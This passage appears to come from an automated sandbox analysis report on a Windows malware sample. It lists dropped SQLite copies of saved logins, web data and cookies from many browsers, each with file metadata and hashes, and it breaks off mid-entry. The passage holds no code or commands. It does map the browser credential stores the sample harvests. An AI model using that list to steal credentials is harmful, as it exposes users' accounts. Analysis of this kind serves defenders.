                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\elements browser_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\elements browser_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\elements browser_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\google_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\google_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\google_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\kometa_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\kometa_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\kometa_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\liebao_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\liebao_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\liebao_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\mail.ru_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\mail.ru_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\mail.ru_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\microsoft_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\microsoft_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\microsoft_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\opera stable_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\opera stable_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\opera stable_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\orbitum_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\orbitum_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
